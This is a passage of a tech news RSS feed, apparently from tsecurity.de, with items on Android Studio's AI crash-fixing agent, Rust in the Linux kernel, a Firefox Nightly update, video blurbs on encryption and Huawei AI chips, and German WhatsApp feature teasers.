  <li>You can click <b>Fix with Agent</b> to have the Gemini agent ingest the trace, explain the root cause of the retained reference, and write the exact code change (such as unbinding a listener or clearing a static reference) to plug the leak.</li>
</ul>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwBONeahZYC_5KBtkgQkc5vTjzmN5D-ypyOOScCRcp6Cy8CZeNHVWeNViBS6D_we7HaRy_AjIg1tptZAVEqNTeQ4IVVjoQp4_XJp45648fhiD0H5qvNmiPphikYGDNbEyus-QTVkSU9imwJm4QN0CKnWFs6JZsVkC21SXl9LXAnSndereOvE6iDWOmsEo/s1250/Leak_Canary_4e3675ccb2_ZXI2sE.webp"><img border="0" data-original-height="640" data-original-width="1250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwBONeahZYC_5KBtkgQkc5vTjzmN5D-ypyOOScCRcp6Cy8CZeNHVWeNViBS6D_we7HaRy_AjIg1tptZAVEqNTeQ4IVVjoQp4_XJp45648fhiD0H5qvNmiPphikYGDNbEyus-QTVkSU9imwJm4QN0CKnWFs6JZsVkC21SXl9LXAnSndereOvE6iDWOmsEo/s1600/Leak_Canary_4e3675ccb2_ZXI2sE.webp"></a><span><i>Review memory leaks identified via LeakCanary through the Fix with Agent button.</i></span></div>

<h2>App Quality Insights agent integration</h2>

<p>Tracking down the root cause of an app crash can require manually synthesizing stack traces, device data, and source code. However Android Studio’s App Quality Insights (AQI) is now fully integrated with Agent Mode to do the heavy lifting for you.</p>

<p>When you click on a crash in the AQI panel, you immediately get a concise, high-level summary of the issue. If you need to dig deeper, simply click <b>See more</b>. This opens a dedicated chat where the agent uses your selected model and pulls in local source code and the full stack trace to deliver a comprehensive explanation of the failure.</p>

<p>With the new agent integration, you move directly from issue identification to resolution. By clicking <b>Fix with AI</b>, the agent will analyze the issue, propose a step-by-step fix plan, and—upon your approval—apply the necessary code changes directly to your project and verify the resulting fix</p>

<div class="separator">
  
</div><p><i>The <b>Fix with AI</b> button triggering the agent to analyze the issue, then propose the fix</i></p>

<h2>Quality &amp; stability improvements</h2>

<p>Beyond new features, we’ve continued our focus on quality by addressing numerous bugs and incorporating the latest stability and performance improvements from the IntelliJ platform, making this a significant enhancement for your daily development.</p>

<h2>Get Started</h2>

<p>Ready to dive in and accelerate your development? <a href="https://developer.android.com/studio">Download</a> Android Studio Quail 2 and start exploring these new features today! As always, your feedback is crucial to us. <a href="https://developer.android.com/studio/known-issues">Check known issues</a>, <a href="https://developer.android.com/studio/report-bugs">report bugs</a>, and be part of our vibrant community on <a href="https://www.linkedin.com/showcase/androiddev/posts/?feedView=all">LinkedIn</a>, <a href="https://medium.com/androiddevelopers">Medium</a>, <a href="https://www.youtube.com/c/AndroidDevelopers/videos">YouTube</a>, or <a href="https://twitter.com/androidstudio">X</a>. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: More Kit, More Control – These Weeks in Firefox: Issue 203]]></title>
<description><![CDATA[Highlights

James enabled adaptive autofill in Nightly for testing, which we believe should provide better results in the URL bar when doing autocomplete!
Jack updated the illustrations shown on some of our error pages to match the latest approved designs, giving users more polished artwork when ...]]></description>
<link>https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:32 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>James <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032547">enabled adaptive autofill in Nightly</a> for testing, which we believe should provide better results in the URL bar when doing autocomplete!</li>
<li>Jack <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031837">updated the illustrations shown on some of our error pages</a> to match the latest approved designs, giving users more polished artwork when the browser encounters connection or security errors!</li>
</ul>
<p><img alt="Internet connection error page with an adorable Kit illustration" class="aligncenter wp-image-2080 size-full" height="652" src="https://blog.nightly.mozilla.org/files/2026/06/image2-1.png" width="1584"></p>
<ul>
<li>Controls for the Memories feature <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032998">can now be set during Smart Window onboarding</a></li>
</ul>
<p><img alt='Two radio button controls for the Smart Window Memories feature, including "Chats in Smart Window" and "Browsing across Firefox"' class="aligncenter wp-image-2078 size-full" height="546" src="https://blog.nightly.mozilla.org/files/2026/06/image4-1-e1780509799577.png" width="500"></p>
<p> </p>
<ul>
<li>We’ve disabled the CSS filter implicitly applied to WebExtension pageAction SVG icons across all release channels starting in Firefox 152, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016509">completing the deprecation</a>
<ul>
<li><b>NOTE:</b> The blog post published at<a href="https://blog.mozilla.org/addons/2026/04/23/webextensions-api-changes-firefox-149-152/"> WebExtensions API changes in Firefox 149-152</a> provides to extensions developers more details about this deprecation and links to the related MDN docs.</li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h4><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=2031599%2C2033820%2C2034178%2C1930213%2C2035355%2C1611643%2C2020302%2C2026007%2C2031015%2C2035252%2C2036528%2C411384%2C2033780%2C2036199%2C1812100%2C1898257%2C2030070%2C2030072">Resolved bugs (excluding employees)</a></h4>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Amin Amir</li>
<li>Pranjali Srivastava</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li> 🌟:23rd: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1812100">Regression: The new swipe-to-navigation indicator stucks for a moment, when deciding not to navigate the other page</a></li>
<li>🌟Akeem Omosanya: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035252">Remove commented-out code in SearchService.sys.mjs</a></li>
<li>Amin Amir:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">Fix browsingContext.sys.mjs to assign to #contextCreatedHandled instead of contextCreatedHandled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033820">Fix missing WITHOUT ROWID SQLite performance optimization in SERPCategorization.sys.mjs</a></li>
</ul>
</li>
<li>🌟Sahaj: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031015">Suggest the default target language for translation after changing the detected source language</a></li>
<li>🌟JIANG Zhirui: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036199">Breakpad build failed on Windows using VS2026 due to removal of stdext</a></li>
<li> John Iweh: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030072">Add “Open in New Tab” and “Open in New Container Tab” options to the context menu for Tabs from Other Devices</a></li>
<li>Jak: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030070">Bookmarks and History – should respect the “When you open a link, image or media in a new tab, switch to it immediately” setting</a></li>
<li>🌟Andy [:rgbcmy]: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1611643">Autoplayed next video should also be PIP</a></li>
<li> konyhéa: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1930213">“Escape” key should collapse the expanded on hover sidebar launcher even if hover is still active.</a></li>
<li> Pranjali Srivastava:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1898257">Remove icon property from sidebar extensions</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026007">Show language-agnostic SelectTranslations context menu item when the source and target languages are the same</a></li>
</ul>
</li>
</ul>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>Fixed long-standing regression on the autocomplete and datalist popups for extension inline options pages on about:addons (introduced in Firefox 68 by<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1532724"> Bug 1532724</a>, fix shipping in Firefox 152) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1595158"> Bug 1595158</a></li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed access to web-accessible resources declared with &lt;all_urls&gt; from sandboxed documents (null-principal URLs), restoring extension redirects from the context-menu search flow, starting in Firefox 152 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033905"> Bug 2033905</a></li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Added exhaustive test coverage for tabs.move() against additional edge cases related to split-view tabs –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029092"> Bug 2029092</a></li>
</ul>
<h4>DevTools</h4>
<ul>
<li>Andreas Farre improved the Session History tab in the Application panel (still behind devtools.application.sessionHistory.enabled)
<ul>
<li>added support for remote debugging (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2014064">#2014064</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016121">#2016121</a>)</li>
<li>made sure that calls to History.replaceState are reflected in the UI (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037359">#2037359</a>)</li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> fixed the most frequent DevTools crash we were observing in Telemetry, adding a guard against IDBTransaction errors when retrieving breakpoints in the Debugger (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030260">#2030260</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> fixed the image preview tooltip for relative URLs images in constructed stylesheet (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035503">#2035503</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> reduced the overhead we had because of network requests monitoring by only decoding response content when the user actually want to see the response (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026228">#2026228</a>)</li>
</ul>
<h4>WebDriver</h4>
<ul>
<li>Amin Amir cleaned up an <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">incorrect variable assignment</a> in our browsingContext module.</li>
<li>Logan Rosen <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036603">updated stale references and broken links</a> in our documentation about Marionette.</li>
<li>Sameem improved the Marionette and WebDriver BiDi <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020302">screenshot commands to enforce maximum allowed dimensions</a>.</li>
<li>Leo McArdle fixed <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030964">the regression in the “log.entryAdded” event, which lacked an error message in the “text” field for the messages of type “error”</a>.</li>
<li>Henrik Skupin fixed an issue in Marionette where <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033769">WebDriver:Navigate and WebDriver:Refresh did not handle errors</a> when the underlying navigation failed.</li>
<li>Henrik Skupin <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1839953">improved geckodriver to detect an early Firefox exit during startup on Android</a>, avoiding up to 60 seconds of unnecessary connection attempts.</li>
<li>Henrik Skupin updated the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028933">geckodriver CI build job to produce a universal macOS binary</a> supporting both x64 and aarch64.</li>
</ul>
<h4>Lint, Docs and Workflow</h4>
<ul>
<li>Sylvestre <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023411">ported some linters</a> (e.g. file-whitespace, test-manifest-toml, license, file-perm, rejected-words &amp; more) to Rust to help improve the runtime of the code review bot.</li>
<li>Dale has been working on migration to moz-src for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034040">customkeys</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035086">dom/quota</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035295">odom/geolocation</a>
<ul>
<li><a href="https://arewemozsrcyet.com/">https://arewemozsrcyet.com/</a></li>
</ul>
</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>We did our first region-specific trainhop on May 11th (just 15% of the US), and turned on HNT Nova (and sometimes Widgets) for those clients to get some advance-data of its behaviour in the wild! A note that HNT Nova gets turned on for everybody when Firefox 151 ships on May 19th.
<ul>
<li>We’ll be launching a similar experiment in the DE, probably on May 12th, also at 15% population.</li>
</ul>
</li>
<li>Most of the team is heads down building out a sports-tracking widget, attempting to get that ready in time to be generally available for the upcoming World Cup event.</li>
<li>Dre landed a new world clock widget, which is currently off by default, but pretty snazzy!</li>
</ul>
<p><img alt="World clock widget in New Tab featuring different time zones for YTO, BER, SYD, and LAX." class="aligncenter wp-image-2079 size-full" height="162" src="https://blog.nightly.mozilla.org/files/2026/06/image3-1.png" width="346"></p>
<h4>Search and Urlbar</h4>
<ul>
<li>Nova (URL Bar Design Refresh)
<ul>
<li>Drew and Daisuke continued their work on <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015612">Nova styling for the Address bar</a> (input and view).</li>
</ul>
</li>
<li>Search and Suggest
<ul>
<li>Drew finalized two bugs for World Cup and sports suggestions, which were landed and uplifted: one to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035322">update the localization string for scheduled games</a> and another to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034350">show both teams’ icons in suggestions</a>. Drew also landed and uplifted a fix for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035353">rich search suggestion icons being forced into a square aspect ratio</a>.</li>
<li>Standard8 updated Ecosia favicons to the latest branding, including QA testing and publishing.</li>
</ul>
</li>
<li>Settings Redesign (SRD)
<ul>
<li>Stephanie landed a test to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021512">ensure search suggestion settings are hidden when quicksuggest is disabled</a>, as well as a patch to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031341">resolve TypeScript issues</a> in search.mjs, and is adding test coverage to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2007397">confirm removed search engines are not displayed in the default engines dropdown</a>.</li>
</ul>
</li>
<li>General URL Bar and Component Updates
<ul>
<li>Daisuke landed implementation of the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893083">context menu on URL bar results</a>, and a fix to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020177">show the loading URL in the URL bar when starting up with a homepage</a>.
<ul>
<li>Marco is working on several tasks, including a <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1756564">PDF download / focus stealing issue</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1924124">allowing arrays to be bound in Sqlite.sys.mjs</a>. Marco also worked on fixes related to Places, such as <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034743">avoiding replacing the favicons database if it is not corrupt</a>.</li>
</ul>
</li>
<li>Standard8 finalized the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028423">URL bar test manifest split</a>. Standard8 also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016401">upgraded us to TypeScript 6</a>.</li>
<li>Moritz landed a fix for URL bar abandonment telemetry being recorded when clicking an engine in the unified search button popup (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032973">Bug 2032973</a>), which was also uplifted. Moritz also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034507">simplified search mode switcher item activation in tests</a>, and made it so that <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036030">the unified search button popup closes when installing an open search engine</a>.</li>
</ul>
</li>
</ul>
<h4>Smart Window</h4>
<ul>
<li>natural language starting with tab close/undo <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035343">2035343</a> with expandable action log <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031508">2031508</a></li>
</ul>
<p><img alt="Tab close and undo actions in Smart Window accompanied by an expandable log of actions taken" class="aligncenter wp-image-2077 size-full" height="256" src="https://blog.nightly.mozilla.org/files/2026/06/image1-1.png" width="220"></p>
<ul>
<li>assistant rendering feedback up/down <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032994">2032994</a> and markdown table <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027029">2027029</a></li>
<li>nova styling blur <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027877">2027877</a> and suggestions <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026823">2026823</a></li>
<li>accessibility screen reader <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028676">2028676</a> and keyboard focus <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037565">2037565</a></li>
<li>optimize conversation starters extra requests <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030005">2030005</a> and caching <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033430">2033430</a></li>
</ul>
<h4>Storybook/Reusable Components/Acorn Design System</h4>
<ul>
<li>Nova token updates occasionally, focused on SRD</li>
</ul>
<h4>UX Fundamentals</h4>
<ul>
<li>Added support for the “SEC_ERROR_CA_CERT_INVALID” certificate error to the Felt Privacy error pages. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035942">2035942</a></li>
</ul>
<h4>Settings Redesign</h4>
<ul>
<li>Settings redesign is being tested and will hopefully go out in Firefox 152!</li>
</ul>
<ul>
<li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Problem With End-to-End Encryption]]></title>
<description><![CDATA[Author: Techquickie - Bewertung: 6635x - Views:137446 Thanks to our sponsor Bitdefender! Try their powerful Scam Protection free for 90 days: https://bitdefend.me/90Linus

Apps like Signal, WhatsApp, and iMessage promise nobody can read your messages. Mostly true - but in 2026, encrypted chat has...]]></description>
<link>https://tsecurity.de/de/3693251/videos/the-problem-with-end-to-end-encryption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693251/videos/the-problem-with-end-to-end-encryption/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:20 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Techquickie - Bewertung: 6635x - Views:137446 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qUVsX49fNFw?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Thanks to our sponsor Bitdefender! Try their powerful Scam Protection free for 90 days: https://bitdefend.me/90Linus<br />
<br />
Apps like Signal, WhatsApp, and iMessage promise nobody can read your messages. Mostly true - but in 2026, encrypted chat has three gaps you can&#039;t ignore, and the biggest one might already be sitting on your own computer. We sat down with David Wiseman, BlackBerry&#039;s VP of Secure Communications, to find out what end-to-end encryption actually protects, what it doesn&#039;t, and how attackers are walking around it without breaking a single line of code.<br />
<br />
Leave a reply with your requests for future episodes.<br />
<br />
► SHOP OUR PRODUCTS: https://lttstore.com<br />
► GET A VPN: https://www.piavpn.com/TechQuickie<br />
► GET EXCLUSIVE CONTENT ON FLOATPLANE: https://lmg.gg/lttfloatplane<br />
► SPONSORS, AFFILIATES, AND PARTNERS: https://lmg.gg/partners<br />
<br />
Timestamps:<br />
0:00 How Encrypted Chats Work<br />
1:45 Signal, WhatsApp, iMessage, and Telegram<br />
2:19 Sponsor<br />
2:57 Metadata Still Leaks<br />
4:02 Phishing, Linked Devices, and Recall<br />
5:17 How to Protect Yourself<br />
5:38 Credits<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China's New Huawei Ascend 950PR Just Destroyed NVIDIA's Future in AI Industry!]]></title>
<description><![CDATA[Author: Evolving AI - Bewertung: 179x - Views:7273 Huawei may have just become NVIDIA’s biggest problem in China.

In this video, we break down Huawei’s new Ascend 950PR AI chip, why it matters for the global semiconductor war, and how U.S. export restrictions may have accelerated China’s push to...]]></description>
<link>https://tsecurity.de/de/3693243/videos/chinas-new-huawei-ascend-950pr-just-destroyed-nvidias-future-in-ai-industry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693243/videos/chinas-new-huawei-ascend-950pr-just-destroyed-nvidias-future-in-ai-industry/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:08 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Evolving AI - Bewertung: 179x - Views:7273 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/sGHhWmeVIqQ?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Huawei may have just become NVIDIA’s biggest problem in China.<br />
<br />
In this video, we break down Huawei’s new Ascend 950PR AI chip, why it matters for the global semiconductor war, and how U.S. export restrictions may have accelerated China’s push toward technological independence. The Ascend 950PR is designed mainly for AI inference and is built by SMIC using advanced DUV multi-patterning. Huawei is also attacking NVIDIA’s biggest advantages beyond hardware by building a CUDA compatibility layer through CANN and scaling thousands of Ascend NPUs together inside the Atlas 950 SuperPod using UnifiedBus interconnect technology. We also look at reported demand from ByteDance, Alibaba Cloud, and Tencent, the role of DeepSeek models optimized for Ascend hardware, and why NVIDIA could lose major market share inside China even without Huawei beating its most advanced chips in every benchmark. This is bigger than one AI chip. China is building a parallel AI ecosystem across chips, software, networking, cloud infrastructure, and AI models — and Huawei is quickly becoming the center of it.<br />
<br />
#Huawei #NVIDIA #AIChips #Ascend950PR #ChinaTech #Semiconductors #ArtificialIntelligence<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Privat mit KI chatten: Inkognito-Chat mit Meta AI in WhatsApp starten]]></title>
<description><![CDATA[Der Beitrag Privat mit KI chatten: Inkognito-Chat mit Meta AI in WhatsApp starten erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
WhatsApp erweitert seinen KI-Assistenten Meta AI um einen Inkognito-Modus. D...]]></description>
<link>https://tsecurity.de/de/3693166/it-nachrichten/privat-mit-ki-chatten-inkognito-chat-mit-meta-ai-in-whatsapp-starten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693166/it-nachrichten/privat-mit-ki-chatten-inkognito-chat-mit-meta-ai-in-whatsapp-starten/</guid>
<pubDate>Sat, 25 Jul 2026 07:59:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/06/inkognito-chat-meta-ai-whatsapp/">Privat mit KI chatten: Inkognito-Chat mit Meta AI in WhatsApp starten</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>WhatsApp erweitert seinen KI-Assistenten Meta AI um einen Inkognito-Modus. Damit können Nutzer künftig private Chats mit der KI führen, die nach dem Verlassen automatisch gelöscht werden. Wir erklären, wie du den neuen Modus aktivierst, was dabei mit deinen Daten passiert und wann die Funktion verfügbar ist.  Künstliche Intelligenz hat sich in den vergangenen Jahren rasant […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/06/inkognito-chat-meta-ai-whatsapp/">Privat mit KI chatten: Inkognito-Chat mit Meta AI in WhatsApp starten</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp: So kannst du zwei Accounts gleichzeitig auf dem iPhone nutzen]]></title>
<description><![CDATA[Der Beitrag WhatsApp: So kannst du zwei Accounts gleichzeitig auf dem iPhone nutzen erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
WhatsApp ermöglicht es jetzt auch auf dem iPhone, zwei Accounts gleichzeit...]]></description>
<link>https://tsecurity.de/de/3693164/it-nachrichten/whatsapp-so-kannst-du-zwei-accounts-gleichzeitig-auf-dem-iphone-nutzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693164/it-nachrichten/whatsapp-so-kannst-du-zwei-accounts-gleichzeitig-auf-dem-iphone-nutzen/</guid>
<pubDate>Sat, 25 Jul 2026 07:56:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/06/14/whatsapp-zwei-accounts-nutzen-iphone/">WhatsApp: So kannst du zwei Accounts gleichzeitig auf dem iPhone nutzen</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>WhatsApp ermöglicht es jetzt auch auf dem iPhone, zwei Accounts gleichzeitig auf einem Gerät zu nutzen. Damit lassen sich etwa private und berufliche Chats bequem trennen, ohne ständig Konten wechseln oder eine zweite App verwenden zu müssen. Wir zeigen dir, wie die Einrichtung funktioniert. Android-Nutzer haben bereits seit 2023 die Möglichkeit, zwei WhatsApp-Konten gleichzeitig auf […]</p>
